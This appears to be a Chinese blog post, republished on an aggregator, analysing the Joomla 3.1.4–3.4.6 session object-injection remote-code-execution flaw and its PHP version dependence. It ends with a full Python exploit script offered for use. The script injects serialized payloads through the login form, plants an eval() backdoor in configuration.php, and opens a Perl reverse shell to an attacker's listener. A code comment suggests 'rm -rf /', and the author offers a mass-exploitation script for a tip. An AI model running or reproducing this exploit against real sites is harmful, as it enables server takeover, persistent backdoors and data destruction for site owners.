距離Joomla漏洞爆出已經有一段時間了，網上資料也出來很多了，不過大多都是類似的，我這邊參考總結了一下，順便加了一點本地化復現和分析的干貨。

0x01漏洞介紹

Joomla是一套全球知名的內容管理系統，是使用PHP語言加上MySQL數據庫所開發的軟件系統。

漏洞本質是Joomla對session數據處理不當，未經授權的攻擊者可以發送精心構造的惡意 HTTP 請求，獲取服務器權限，實現遠程命令執行。

0x02 影響范圍

本地復現實測3.1.4-3.4.6

0x03 漏洞原因分析

該漏洞是和Joomla的會話的運作機制有關，Joomla 會話以 PHP Objects 的形式存儲在數據庫中且由 PHP 會話函數處理，但是由于Mysql無法保存Null 字節，函數在將session寫入數據庫和讀取時會對象因大小不正確而導致不合法從而溢出。因為未認證用戶的會話也可存儲，所以該對象注入 (Object Injection) 可以在未登錄認證的情況下攻擊成功，導致RCE。

當我們在 Joomla中執行 POST 請求時，通常會有303重定向將我們重定向至結果頁。這是利用的重要事項，因為第一個請求(含參數)將只會導致 Joomla 執行動作并存儲(例如調用write() 函數)會話，之后303重定向將進行檢索(如調用read() 函數)并將信息顯示給用戶。

漏洞利用文件 ‘libraries/joomla/session/storage/database.php’中定義的函數 read()和 write()由session_set_save_handler()設置，作為‘libraries/joomla/session/session.php:__start’ session_start() 調用的讀和寫處理程序。

由于Mysql無法保存Null 字節，write函數在將數據存儲到數據庫之前(write函數)會用‘\0\0\0’替換‘\x00\x2a\x00’(chr(0).’’.chr(0))，而在序列化對象中， $protected 變量被賦予‘\x00\x2a\x00’前綴。

當讀取數據庫中的數據時， read 函數會用‘\x00\x2a\x00’(NN)替換‘\0\0\0’，重構原始對象。

這種替換的主要問題在于它用3個字節替換了6個字節，之前所述，我們能夠通過動作參數的讀取和寫入來操縱該會話對象進行注入將被3個字節替換的‘\0\0\0’，導致對象因大小不正確(字節長度不同)導致不合法，造成溢出。

實際中發送的特殊構造(包括寫入webshell)的請求：

URL decode：

在本次曝光的Poc中就是用username字段進行溢出，password字段進行對象注入，如果插入任意serialize字符串，構造反序列化漏洞了

0x04 漏洞影響范圍分析

我個人為了確定該漏洞的版本邊界值，寫了一個簡單的批量利用腳本。

下方是批量利用的腳本測試的結果，很奇怪的是，該漏洞版本并沒有影響3.0.0-3.1.3，而是從3.1.4版本開始的。(黃色箭頭所示的【dacade】是我的shell密碼，我直接將shell密碼寫死了，懶得后面在菜刀連接的時候復制那段隨機生成碼費事)

對于版本信息3.1.4-3.4.6的CMS，在執行exp文件時都是可以正常getshell的，

3.1.4-3.4.6版本利用burp按步分析，對shell連接測試的時候沒問題。(fuck是我寫的echo字段，具體情況根據個人所寫代碼的不同而不同)

在3.1.4以下版本該步驟無法全部正常執行，寫入shell失敗，經過長時間的追蹤發現，是由于在發送特殊構造(包括寫入webshell)的請求時步驟時，無法file_put_contents寫入shell，

而在3.4.6版本以上，Joomla對于session信息進行了編碼(base64)處理，所以無法觸發該漏洞。

同時，該漏洞和php版本也有密切關系，因為高版本的PHP版本(PHP>=5.6.13)對于seesion的處理方式發生了變化。

5.6.13版本以前是第一個變量解析錯誤注銷第一個變量，然后解析第二個變量，但是5.6.13以后如果第一個變量錯誤，直接銷毀整個session。

https://github.com/php/php-src/blob/PHP-5.6.13/ext/session/session.c

當PHP版本為5.4.45時，

可以getshell，

當PHP版本為5.6.27時

無法getshell，

0x05 漏洞復現

本地環境：phpstudy [5.4.45-php+Apache+Mysql]

搭建過程：

將下載好的CMS解壓縮到網站目錄，然后進入網頁端按照提示安裝即可。

檢測腳本的話網上單個的檢測腳本挺多的，你們隨便下載一個就行了，

逐步調試:

1、獲取目標站點cookie

2、獲取目標站點token

3、發送特殊構造(包括寫入webshell)的請求

4、對shell進行連接測試

可以正常getshell。

0x06 漏洞總結

該漏洞影響的范圍是很小的，原因在于:

1.Joomla后臺提供了一鍵升級功能，站長的升級成本小并且方便。(你不升級它天天提示，估計強迫癥不想升級都升級了)

2.影響的版本范圍不大。

3.有一定的PHP版本要求。

PS:這個漏洞的批量腳本我就不單獨放出來了，要是有想要的歡迎贊賞一杯coffee獲取，不過單個的調試腳本還是有的。

單個調試腳本:

#!/usr/bin/env python3

import requests

from bs4 import BeautifulSoup

import sys

import string

import random

import argparse

from termcolor import colored

PROXS = {'http':'127.0.0.1:8080'}

PROXS = {}

def random_string(stringLength):

letters = string.ascii_lowercase

return ''.join(random.choice(letters) for i in range(stringLength))

backdoor_param = random_string(50)

def print_info(str):

print(colored("[*] " + str,"cyan"))

def print_ok(str):

print(colored("[+] "+ str,"green"))

def print_error(str):

print(colored("[-] "+ str,"red"))

def print_warning(str):

print(colored("[!!] " + str,"yellow"))

def get_token(url, cook):

token = ''

resp = requests.get(url, cookies=cook, proxies = PROXS)

html = BeautifulSoup(resp.text,'html.parser')

# csrf token is the last input

for v in html.find_all('input'):

csrf = v

csrf = csrf.get('name')

return csrf

def get_error(url, cook):

resp = requests.get(url, cookies = cook, proxies = PROXS)

if 'Failed to decode session object' in resp.text:

#print(resp.text)

return False

#print(resp.text)

return True

def get_cook(url):

resp = requests.get(url, proxies=PROXS)

#print(resp.cookies)

return resp.cookies

def gen_pay(function, command):

# Generate the payload for call_user_func('FUNCTION','COMMAND')

template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'

#payload = command + ' || $a=\'http://wtf\';'

payload = 'http://l4m3rz.l337/;' + command

# Following payload will append an eval() at the enabled of the configuration file

#payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'

function_len = len(function)

final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))

return final

def make_req(url , object_payload):

# just make a req with object

print_info('Getting Session Cookie ..')

cook = get_cook(url)

print_info('Getting CSRF Token ..')

csrf = get_token( url, cook)

user_payload = '\\0\\0\\0' * 9

padding = 'AAA' # It will land at this padding

working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'

clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects

inj_object = '";'

inj_object += object_payload

inj_object += 's:6:"return";s:102:' # end the object with the 'return' part

password_payload = padding + inj_object

params = {

'username': user_payload,

'password': password_payload,

'option':'com_users',

'task':'user.login',

csrf :'1'

}

print_info('Sending request ..')

resp = requests.post(url, proxies = PROXS, cookies = cook,data=params)

return resp.text

def get_backdoor_pay():

# This payload will backdoor the the configuration .PHP with an eval on POST request

function = 'assert'

template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'

# payload = command + ' || $a=\'http://wtf\';'

# Following payload will append an eval() at the enabled of the configuration file

payload = 'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'

function_len = len(function)

final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))

return final

def check(url):

check_string = random_string(20)

target_url = url + 'index.php/component/users'

html = make_req(url, gen_pay('print_r',check_string))

if check_string in html:

return True

else:

return False

def ping_backdoor(url,param_name):

res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)

if 'PWNED' in res.text:

return True

return False

def execute_backdoor(url, payload_code):

# Execute PHP code from the backdoor

res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)

print(res.text)

def exploit(url, lhost, lport):

# Exploit the target

# Default exploitation will append en eval function at the end of the configuration.pphp

# as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')

# e.g. get_payload('system','rm -rf /')

# First check that the backdoor has not been already implanted

target_url = url + 'index.php/component/users'

make_req(target_url, get_backdoor_pay())

if ping_backdoor(url, backdoor_param):

print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)

print_info('Now it\'s time to reverse, trying with a system + perl')

execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')

if __name__ == '__main__':

parser = argparse.ArgumentParser()

parser.add_argument('-t','--target',required=True,help='Joomla Target')

parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')

parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')

parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')

parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')

args = vars(parser.parse_args())

url = args['target']

if(check(url)):

print_ok('Vulnerable')

if args['exploit']:

exploit(url, args['lhost'], args['lport'])

else:

print_info('Use --exploit to exploit it')

else:

print_error('Seems NOT Vulnerable ;/')

參考：

總結

以上是生活随笔為你收集整理的joomla 3.4.5 php版本,Joomla3.4.6漏洞最强总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。